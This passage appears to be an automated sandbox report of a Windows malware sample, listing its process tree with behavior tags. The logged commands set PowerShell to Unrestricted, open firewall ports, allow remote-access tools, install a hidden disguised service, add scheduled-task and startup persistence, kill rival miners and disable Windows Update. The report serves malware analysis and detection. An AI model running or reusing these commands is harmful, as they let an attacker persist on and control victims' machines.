                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
                                                                                                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe" Set-ExecutionPolicy Unrestricted
                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                    PID:1692
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                  C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell" /f
                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                    PID:2872
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                    C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Unrestricted" /f /reg:64
                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                      PID:2664
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                      C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Unrestricted" /f
                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                        PID:2184
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                        C:\Windows\System32\netsh.exe advfirewall firewall add rule name="Open port 443" dir=in action=allow protocol=TCP localport=443
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • Modifies Windows Firewall
                                                                                                                                                                                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                        PID:2648
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                        C:\Windows\System32\netsh.exe advfirewall firewall set rule name="Open port 443" new enable=yes
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • Modifies Windows Firewall
                                                                                                                                                                                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                        PID:2040
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                        C:\Windows\System32\netsh.exe advfirewall firewall add rule name="Open port 80" dir=in action=allow protocol=TCP localport=80
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • Modifies Windows Firewall
                                                                                                                                                                                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                        PID:1252
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                        C:\Windows\System32\netsh.exe advfirewall firewall set rule name="Open port 80" new enable=yes
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • Modifies Windows Firewall
                                                                                                                                                                                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                        PID:1704
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                        C:\Windows\System32\netsh.exe advfirewall firewall add rule name="Open port 6568" dir=in action=allow protocol=TCP localport=6568
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • Modifies Windows Firewall
                                                                                                                                                                                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                        PID:1380
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                        C:\Windows\System32\netsh.exe advfirewall firewall set rule name="Open port 6568" new enable=yes
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • Modifies Windows Firewall
                                                                                                                                                                                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                        PID:2972
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                        C:\Windows\System32\netsh.exe advfirewall firewall add rule name="Open port 50001" dir=in action=allow protocol=TCP localport=50001
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • Modifies Windows Firewall
                                                                                                                                                                                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                        PID:1696
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                        C:\Windows\System32\netsh.exe advfirewall firewall set rule name="Open port 50001" new enable=yes
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • Modifies Windows Firewall
                                                                                                                                                                                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                        PID:824
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                        C:\Windows\System32\netsh.exe advfirewall firewall add rule name="AnyDesk1" dir=in action=allow program="C:\Program Files (x86)\AnyDesk\AnyDesk.exe" enable=yes
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • Modifies Windows Firewall
                                                                                                                                                                                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                        PID:1684
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                        C:\Windows\System32\netsh.exe advfirewall firewall add rule name="AnyDesk2" dir=in action=allow program="C:\Program Files\AnyDesk\AnyDesk.exe" enable=yes
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • Modifies Windows Firewall
                                                                                                                                                                                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                        PID:2980
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                        C:\Windows\System32\netsh.exe advfirewall firewall add rule name="AnyDesk3" dir=in action=allow program="C:\ProgramData\AnyDesk\AnyDesk.exe" enable=yes
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • Modifies Windows Firewall
                                                                                                                                                                                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                        PID:1192
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                        C:\Windows\System32\netsh.exe advfirewall firewall add rule name="TeamViewer1" dir=in action=allow program="C:\Program Files (x86)\TeamViewer\TeamViewer.exe" enable=yes
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • Modifies Windows Firewall
                                                                                                                                                                                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                        PID:3020
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                        C:\Windows\System32\netsh.exe advfirewall firewall add rule name="TeamViewer2" dir=in action=allow program="C:\Program Files\TeamViewer\TeamViewer.exe" enable=yes
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • Modifies Windows Firewall
                                                                                                                                                                                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                        PID:2768
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                        C:\Windows\System32\netsh.exe advfirewall firewall add rule name="TeamViewer3" dir=in action=allow program="C:\ProgramData\TeamViewer\TeamViewer.exe" enable=yes
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • Modifies Windows Firewall
                                                                                                                                                                                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                        PID:676
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                        C:\Windows\System32\netsh.exe advfirewall firewall add rule name="Intel1" dir=in action=allow program="C:\ProgramData\IntelSvc.exe" enable=yes
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • Modifies Windows Firewall
                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                        PID:1804
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                        C:\Windows\System32\netsh.exe advfirewall firewall add rule name="Intel2" dir=in action=allow program="C:\Users\Public\IntelSvc.exe" enable=yes
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • Modifies Windows Firewall
                                                                                                                                                                                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                        PID:1596
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                        C:\Windows\System32\netsh.exe advfirewall firewall add rule name="Intel3" dir=in action=allow program="C:\Users\Admin\AppData\Local\OneDrive\fontdrvhots.exe" enable=yes
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • Modifies Windows Firewall
                                                                                                                                                                                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                        PID:1936
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                        C:\Windows\System32\netsh.exe advfirewall firewall add rule name="Intel4" dir=in action=allow program="C:\Users\Admin\AppData\Local\Temp\tv_x86.exe" enable=yes
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • Modifies Windows Firewall
                                                                                                                                                                                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                        PID:1796
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                        C:\Windows\System32\attrib.exe -h -r -s "C:\ProgramData\USOShared\*.*"
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • Views/modifies file attributes
                                                                                                                                                                                                                                                        PID:1340
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                        C:\Windows\System32\ping.exe 192.168.1.1 -n 2
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                                                                                        PID:1728
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -Command "Start-Process 'C:\ProgramData\IntelSvc.exe' -ArgumentList '-install_service' -verb runas -windowstyle hidden"
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                        PID:1740
                                                                                                                                                                                                                                                        • C:\ProgramData\IntelSvc.exe
                                                                                                                                                                                                                                                          "C:\ProgramData\IntelSvc.exe" -install_service
                                                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                          • Writes to the Master Boot Record (MBR)
                                                                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                          PID:2060
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                        C:\Windows\System32\ping.exe 192.168.1.1 -n 4
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                                                                                        PID:1864
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\Intel(R) Utiliti" /v "ImagePath" /t "REG_EXPAND_SZ" /d "\"C:\ProgramData\IntelSvc.exe\" w -sid 1" /f
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • Sets service image path in registry
                                                                                                                                                                                                                                                        PID:2644
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\Intel(R) Utiliti" /v "ImagePath" /t "REG_EXPAND_SZ" /d "\"C:\ProgramData\IntelSvc.exe\" w -sid 1" /f /reg:64
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • Sets service image path in registry
                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                        PID:2908
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                        C:\Windows\System32\attrib.exe +h +r +s "C:\ProgramData\IntelSvc.exe"
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • Views/modifies file attributes
                                                                                                                                                                                                                                                        PID:2868
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                        C:\Windows\System32\attrib.exe +h +r +s "C:\ProgramData\IntelSvc.exe"
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • Views/modifies file attributes
                                                                                                                                                                                                                                                        PID:2620
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                        C:\Windows\System32\schtasks.exe /create /sc minute /mo 58 /tn "OneDrv" /tr "\"C:\Users\Admin\AppData\Local\OneDrive\fontdrvhots.exe\"" /f
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                        PID:2764
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe "$s=(New-Object -COM WScript.Shell).CreateShortcut('"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\TeamViewer_Service.lnk"');$s.TargetPath='"C:\Users\Admin\AppData\Local\Temp\tv_x86.exe"';$s.IconLocation='"C:\Users\Admin\AppData\Local\Temp\tv_x86.exe"';$s.WorkingDirectory='"C:\Users\Admin\AppData\Local\Temp"';$s.WindowStyle=7;$s.Save()"
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                        PID:2716
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe "$s=(New-Object -COM WScript.Shell).CreateShortcut('"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TeamViewer_Service.lnk"');$s.TargetPath='"C:\Users\Admin\AppData\Local\Temp\tv_x86.exe"';$s.IconLocation='"C:\Users\Admin\AppData\Local\Temp\tv_x86.exe"';$s.WorkingDirectory='"C:\Users\Admin\AppData\Local\Temp"';$s.WindowStyle=7;$s.Save()"
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • Drops startup file
                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                        PID:1848
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                        C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • Enumerates processes with tasklist
                                                                                                                                                                                                                                                        PID:2648
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo "x86" 2>NUL"
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                          PID:868
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\find.exe
                                                                                                                                                                                                                                                          C:\Windows\System32\find.exe /i "64"
                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                          PID:1568
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                          C:\Windows\System32\reg.exe Query "HKLM\Hardware\Description\System\CentralProcessor\0"
                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                                                          PID:1972
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\find.exe
                                                                                                                                                                                                                                                          C:\Windows\System32\find.exe /i "x86"
                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                            PID:1452
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                            C:\Windows\System32\tasklist.exe /FI "IMAGENAME eq Sophos.exe"
                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                            • Enumerates processes with tasklist
                                                                                                                                                                                                                                                            PID:2044
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                            C:\Windows\System32\findstr.exe /i /c:"Sophos"
                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                              PID:2004
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                              C:\Windows\System32\ping.exe 192.168.1.1 -n 2
                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                              • Runs ping.exe
                                                                                                                                                                                                                                                              PID:1252
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -Command "& {Get-Content -Path "'C:\Users\Admin\AppData\Local\Temp\Intxt1.ps1'" | Out-File -FilePath "'C:\Users\Admin\AppData\Local\Temp\Intxt2.ps1'" -Encoding ascii}" -Wait
                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                              PID:1484
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\Intxt2.ps1"
                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                              PID:2636
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                              C:\Windows\System32\findstr.exe /i /b /v /c:"Name" /c:"----" "C:\Users\Admin\AppData\Local\Temp\Intxt1.txt"
                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                PID:2864
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" echo "Get-WmiObject" 2>NUL"
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                PID:880
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                C:\Windows\System32\findstr.exe /i /c:"#"
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                  PID:1020
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c C:\Windows\System32\wbem\WMIC.exe process where "name like '%Get-WmiObject%'" get ExecutablePath,status /format:csv
                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                    PID:1524
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                      C:\Windows\System32\wbem\WMIC.exe process where "name like '%Get-WmiObject%'" get ExecutablePath,status /format:csv
                                                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                                                        PID:1396
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c DIR /s "C:\Get-WmiObject*.exe" /B /O:D
                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                        PID:3048
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                        C:\Windows\System32\wbem\WMIC.exe process where "name like '%RtkAudio%'" Call Terminate
                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                        • Kills process with WMI
                                                                                                                                                                                                                                                                        PID:912
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                        C:\Windows\System32\wbem\WMIC.exe process where "name like '%Xmrig%'" Call Terminate
                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                        • Kills process with WMI
                                                                                                                                                                                                                                                                        PID:1980
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                        C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /f /reg:64
                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                        PID:2080
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                        C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d "1" /f /reg:64
                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                          PID:888
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                          C:\Windows\System32\netsh.exe stop "Windows Update"
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                          PID:1040
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                          C:\Windows\System32\SC.exe config "Windows Update" start= disabled
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                                                                                                                          PID:2152
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                          C:\Windows\System32\netsh.exe stop "Service Network"
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                          PID:1884
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                          C:\Windows\System32\netsh.exe stop "ServiceNetwork"
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                          PID:2524
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                          C:\Windows\System32\netsh.exe stop "App System"
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                          PID:1888
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                          C:\Windows\System32\netsh.exe stop "System"
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                          PID:1584
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                          C:\Windows\System32\netsh.exe stop "loadhost Service"
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                          PID:2900
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                          C:\Windows\System32\netsh.exe stop "loadhost Dhcp"
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                          PID:2880
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                          C:\Windows\System32\netsh.exe stop "loadhostDhcp"
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                          PID:2712
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                          C:\Windows\System32\SC.exe DELETE "Service Network"
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                                                                                                                          PID:2332
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                          C:\Windows\System32\SC.exe DELETE "ServiceNetwork"
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                                                                                                                          PID:2316
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                          C:\Windows\System32\SC.exe DELETE "App System"
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                                                                                                                          PID:2884
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                          C:\Windows\System32\SC.exe DELETE "System"
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                                                                                                                          PID:2732
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                          C:\Windows\System32\SC.exe DELETE "loadhost Service"
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                                                                                                                          PID:2100
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                          C:\Windows\System32\SC.exe DELETE "loadhost Dhcp"
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                          PID:2624
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                          C:\Windows\System32\SC.exe DELETE "loadhostDhcp"
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                                                                                                                          PID:2908
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                          C:\Windows\System32\wbem\WMIC.exe service where "name like 'App System'" call stopservice
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                            PID:2464
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                            C:\Windows\System32\wbem\WMIC.exe service where "name like 'System'" call stopservice
                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                              PID:2480
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                              C:\Windows\System32\wbem\WMIC.exe Service Where "name like 'App System'" Call Delete
                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                PID:2672
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                C:\Windows\System32\wbem\WMIC.exe service where "name like 'ServiceNetwork'" call stopservice
                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                  PID:2872
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                  C:\Windows\System32\wbem\WMIC.exe service where "name like 'Service Network'" call stopservice
                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                    PID:2776
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\wbem\WMIC.exe
